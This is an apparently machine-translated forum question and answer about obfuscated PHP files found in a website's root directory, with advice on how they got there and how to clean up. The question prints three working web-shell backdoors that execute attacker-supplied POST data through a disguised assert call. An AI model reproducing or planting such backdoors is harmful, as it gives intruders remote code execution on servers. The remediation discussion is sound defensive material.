我刚刚注意到我网站的根目录中有几个我没有放在那里的 php 文件。它们包含混淆代码(见下文),这些代码转换为尝试获取/发布/断言语句。我的问题是其他人是否看到了这个,如果这是一个常见的黑客攻击,他们如何能够将它放在网站上?
<?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["213d7"])&&isset($_POST["42df9"])){${${"\x47\x4cO\x42A\x4c\ x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x70xe\x62\x70c\x75"]}($_PO ST["42df9"]);exit();} ?><?php ${"G\x4c\x4f\x42\x41\x4c\x53"}["g\x70x\x65\x62p\x63\x75"]="c";if(isset($_GET["c991d"])&&isset($_POST["bc05e"])){ ${${"\x47\x4cO\x42A\x4c\x53"}["g\x70\x78\x65\x62p\x63\x75"]}=base64_decode("YX\x4ez\x5aX\x49\x3d")."t";@${${"G\x4c\x4fB\x41\x4c\x53"}["\x67\x7 0xe\x62\x70c\x75"]}($_POST["bc05e"]);exit();} ?><?php if (isset($_POST['b0e4d'])) {$license = str_rot13('n'.'f'.'f'.'r'.'e'.'g');$license($_PO ST['b0e4d']);}?>```
是的,听起来您的网站有恶意软件。
黑客可以通过漏洞或通过充当文件管理器的已上传脚本上传这些文件。
例如,如果您的站点允许上传任何文件(如图像),他们可以尝试将恶意软件文件上传到您的站点(使用专门准备的图像),然后利用您系统中的弱点运行它(例如直接访问该文件)。
阅读更多:
如果您正在使用内容管理系统,请确保它始终是最新的以避免风险。
要了解此类恶意软件文件的工作原理,请查看:此恶意 PHP 脚本的作用是什么?
所以接下来的建议步骤是:
查找所有恶意软件文件并将其删除。
请参阅:如何摆脱 eval-base64_decode 之类的 PHP 病毒文件?
您可以使用恶意软件扫描器,例如
如果您使用的是专用服务器,请升级您系统上所有过时的软件包 (
apt-get update)。